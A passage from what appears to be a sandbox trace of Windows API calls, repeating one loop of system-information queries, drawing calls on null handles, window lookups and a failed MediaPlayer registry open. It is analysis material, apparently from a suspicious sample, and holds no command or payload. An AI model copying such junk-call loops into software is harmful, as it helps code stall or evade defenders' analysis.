lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.298] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.298] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.298] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.298] BeginPath (hdc=0x0) returned 0 [0092.298] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.298] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.298] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.298] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.298] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.298] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.298] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.299] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.299] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.299] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.299] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.299] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.299] BeginPath (hdc=0x0) returned 0 [0092.299] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.299] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.299] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.299] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.299] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.299] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.299] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.299] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.299] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.299] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.299] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.299] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.299] BeginPath (hdc=0x0) returned 0 [0092.299] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.299] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.299] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.300] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.300] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.300] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.300] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.300] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.300] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.300] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.300] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.300] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.300] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.300] BeginPath (hdc=0x0) returned 0 [0092.300] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.300] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.300] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.300] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.300] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.300] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.300] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.300] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.300] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.300] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.300] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.301] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.301] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.301] BeginPath (hdc=0x0) returned 0 [0092.301] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.301] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.301] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.301] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.301] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.301] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.301] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.301] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.301] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.301] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.301] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.301] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.301] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.301] BeginPath (hdc=0x0) returned 0 [0092.301] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.301] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.301] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.301] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.301] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.301] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.301] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.301] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.301] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.301] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.302] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.302] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.302] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.302] BeginPath (hdc=0x0) returned 0 [0092.302] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.302] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.302] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.302] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.302] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.302] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.302] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.302] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.302] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.302] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.302] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.302] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.302] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.302] BeginPath (hdc=0x0) returned 0 [0092.302] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.302] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.302] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.302] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.302] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.302] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.302] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.302] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.303] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.303] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.303] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.303] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.303] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.303] BeginPath (hdc=0x0) returned 0 [0092.303] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.303] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.303] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.303] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.303] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.303] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.303] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.303] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.303] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.303] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.303] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.303] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.303] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.303] BeginPath (hdc=0x0) returned 0 [0092.303] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.303] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.303] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.303] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.303] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.303] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.303] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.303] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.304] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.304] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.304] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.304] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.304] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.304] BeginPath (hdc=0x0) returned 0 [0092.304] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.304] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.304] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.304] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.304] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.304] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.304] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.304] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.304] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.304] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.304] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.304] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.304] BeginPath (hdc=0x0) returned 0 [0092.304] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.304] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.304] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.304] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.304] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.304] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.304] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.305] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.305] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.305] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.305] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.305] BeginPath (hdc=0x0) returned 0 [0092.305] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.305] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.305] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.305] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.305] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.305] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.305] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.305] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.305] SetDCPenColor (hdc=0x0, color=0x0) 